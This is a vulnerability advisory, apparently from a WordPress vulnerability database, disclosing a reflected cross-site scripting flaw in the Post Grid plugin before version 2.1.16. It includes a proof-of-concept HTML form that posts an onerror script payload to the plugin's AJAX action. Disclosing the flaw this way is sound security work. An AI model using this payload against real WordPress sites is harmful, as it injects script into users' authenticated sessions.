WordPress Plugin Vulnerabilities
Post Grid < 2.1.16 - Reflected Cross-Site Scripting via post_types
Description
The plugin does not sanitise and escape the post_types parameter before outputting it back in the response of the post_grid_update_taxonomies_terms_by_posttypes AJAX action, available to any authenticated users, leading to a Reflected Cross-Site Scripting
Proof of Concept
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=post_grid_update_taxonomies_terms_by_posttypes" method="POST"> <input type="text" value="<html><img src onerror=alert(/XSS/)>" name="post_types"> <input type="submit" value="Send"> </form> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-15 (about 2 years ago)
Added
2022-03-15 (about 2 years ago)
Last Updated
2022-04-09 (about 2 years ago)